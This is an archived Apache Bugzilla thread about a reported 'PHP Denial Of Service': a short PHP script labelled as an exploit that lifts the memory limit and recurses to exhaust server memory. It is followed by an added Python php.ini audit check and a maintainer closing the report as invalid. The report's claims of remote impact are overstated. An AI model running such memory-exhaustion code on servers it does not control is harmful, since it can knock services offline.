Posted to bugs@httpd.apache.org by bu...@apache.org on 2019/12/14 14:43:31 UTC

[Bug 64002] New: Apache2 HTTP PHP Denial Of Service

https://bz.apache.org/bugzilla/show_bug.cgi?id=64002

            Bug ID: 64002
           Summary: Apache2 HTTP PHP Denial Of Service
           Product: Apache httpd-2
           Version: 2.5-HEAD
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P2
         Component: All
          Assignee: bugs@httpd.apache.org
          Reporter: alicangonullu@yahoo.com
  Target Milestone: ---

> [Suggested description]
> # Exploit Name : Apache2 HTTP DoS
> # Exploit Date : 13-12-2019
> # Exploit Author : Ali Can Gonullu
> 
> # Exploit :
> 
> <?php
> $sayi = 10;
> ini_set("memory_limit","-1"); //Unlimited Memory
> function islem($n) {
> if ($n === 0) {
> return 1;
> } else {
> $hesap += $n*islem($n-1)-$n*islem($n-2)+$n*islem($n-3);
> echo $hesap;
> }
> }
> islem($sayi);
> ?>
> 
> ------------------------------------------
> 
> [Additional Information]
> This vulnerability inflates RAM to give the computer a blue screen.
> With this vulnerability, servers can be shut down.
> The ini_set function is turned on in the original Apache PHP version.
> Apache Solution: Blocking ini_set
> 
> ------------------------------------------
> 
> [VulnerabilityType Other]
> Apache2 HTTP PHP Denial Of Service
> 
> ------------------------------------------
> 
> [Vendor of Product]
> Apache
> 
> ------------------------------------------
> 
> [Affected Product Code Base]
> Apache2 HTTP - All
> 
> ------------------------------------------
> 
> [Affected Component]
> Affected source code
> 
> ------------------------------------------
> 
> [Attack Type]
> Remote
> 
> ------------------------------------------
> 
> [Impact Denial of Service]
> true
> 
> ------------------------------------------
> 
> [Attack Vectors]
> Open PHP file (in this code)
> 
> ------------------------------------------
> 
> [Discoverer]
> Ali Can Gonullu

-- 
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
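
An added example, not part of the original report or of any Apache or PHP code: a small audit of php.ini text for the settings the script in the report relies on, namely an unlimited memory_limit and a callable ini_set. The function names and both sample configurations are constructed for illustration; the fallback values assume PHP's stock defaults of 128M and 30 seconds.

```python
import re

# Constructed sample inputs, not taken from any real server.
WEAK_INI = """\
; constructed sample
memory_limit = -1
max_execution_time = 0
disable_functions =
"""
HARDENED_INI = """\
; constructed sample
memory_limit = 128M
max_execution_time = 30
disable_functions = ini_set, ini_alter
"""

def parse_ini(text):
    """Return {directive: value} for simple 'key = value' php.ini lines."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()      # drop ';' comments
        if not line or line.startswith("["):      # skip blanks and [sections]
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def audit(text):
    """List the settings that leave a script free to exhaust memory."""
    s = parse_ini(text)
    findings = []
    if s.get("memory_limit", "128M") == "-1":
        findings.append("memory_limit is unlimited")
    if s.get("max_execution_time", "30") == "0":
        findings.append("max_execution_time is unlimited")
    disabled = {f.lower() for f in re.split(r"[,\s]+", s.get("disable_functions", "")) if f}
    for fn in ("ini_set", "ini_alter"):           # ini_alter is an alias of ini_set
        if fn not in disabled:
            findings.append(fn + " is callable, so a script can raise memory_limit at run time")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(text))
```

Under mod_php, a memory_limit set with php_admin_value in the server configuration cannot be overridden by ini_set().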


[Bug 64002] Apache2 HTTP PHP Denial Of Service

Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=64002

Eric Covener <co...@gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
         Resolution|---                         |INVALID
             Status|NEW                         |RESOLVED

--- Comment #1 from Eric Covener <co...@gmail.com> ---
php/mod_php aren't maintained here.
